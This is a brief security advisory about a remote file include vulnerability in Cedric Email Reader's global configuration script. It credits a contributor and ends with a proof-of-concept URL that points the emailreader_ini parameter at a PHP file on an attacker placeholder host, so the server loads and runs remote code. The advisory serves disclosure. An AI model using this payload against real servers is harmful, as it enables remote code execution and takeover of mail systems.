Cedric Email Reader Global Configuration Script Remote File Include Vulnerability

Cedric Email Reader Global Configuration Script Remote File Include Vulnerability

This vulnerability may be exploited using a web browser.

MGhz <magas@mail.lt> contributed the following proof of concept code:

http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://[attacker]/code.php